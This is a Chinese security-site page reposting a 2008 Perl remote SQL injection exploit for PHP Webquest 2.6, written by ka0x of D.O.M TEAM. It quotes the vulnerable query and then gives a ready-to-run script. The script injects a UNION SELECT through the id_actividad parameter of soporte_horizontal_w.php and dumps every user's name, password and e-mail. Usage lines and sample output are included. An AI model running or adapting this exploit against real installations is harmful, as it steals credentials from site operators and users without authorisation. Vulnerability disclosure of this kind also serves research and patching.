首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit 来源：D.O.M TEAM 作者：ka0x 发布时间：2008-01-09   #!/usr/bin/perl # PHP Webquest 2.6 Remote SQL Injection Exploit # coded by ka0x - D.O.M TEAM 2008 # we are: ka0x, an0de, xarnuz # download spanish: download: http://phpwebquest.org/descargas/phpwebquest-2.6-espanol.zip # download english: http://phpwebquest.org/descargas/phpwebquest-2.6-international.zip # vuln in soporte_horizontal_w.php: # if ($_GET['id_actividad']!=''){ $id_actividad=$_GET['id_actividad']; } # $sentencia= "SELECT * FROM actividad WHERE id_actividad=".$id_actividad; # ka0x@domlabs:~# perl phpwebquest.pl http://127.0.0.1/webquest/ # # [+] connecting in http://127.0.0.1/webquest/... # [!] user: ka0x  [!] pass: test [!] e-mail: test@test.com use strict; use LWP::UserAgent; my $host = $ARGV[0]; if ($host !~ /^http:/){ $host = 'http://'.$host; } if(!$ARGV[0]) {     print "\n[x] PHP Webquest 2.6 Remote SQL Injection exploit\n";     print "[x] written by ka0x - ka0x01[at]gmail.com\n";     print "[x] usage: perl $0 [host]\n";     print "[x] example: http://host.com/PHPWebquest\n";     exit(1); }     print "\n[+] connecting in $host...\n";     my $cnx = LWP::UserAgent->new() or die;     my $go=$cnx->get($host."/soporte_horizontal_w.php?id_actividad=-1/**/union/**/select/**/1,1,1,1,concat(0x5f5f5f5f,0x5b215d20757365723a20,usuario,0x20205b215d20706173733a20,password,0x205b215d20652d6d61696c3a20,e_mail,0x5f5f5f5f)/**/from/**/usuario/*");     if ($go->content =~ m/____(.*?)____/ms) {         print "$1\n";     } else {         print "\n[-] exploit failed\n"; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Microsoft DirectX SAMI File Pa ·Move Networks Quantum Streamin ·ClamAV 0.91.2 libclamav MEW PE ·Gateway Weblaunch ActiveX Cont ·Eggblog <= 3.1.0 Cookies Remot ·UploadImage/UploadScript 1.0 R ·FlexBB <= 0.6.3 Cookies Remote ·Microsoft FoxServer (vfp6r.dll ·Half-Life CSTRIKE Server 1.6 D ·Microsoft Rich Textbox Control ·DCP-Portal <= 6.11 Remote SQL ·Microsoft VFP_OLE_Server Activ   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved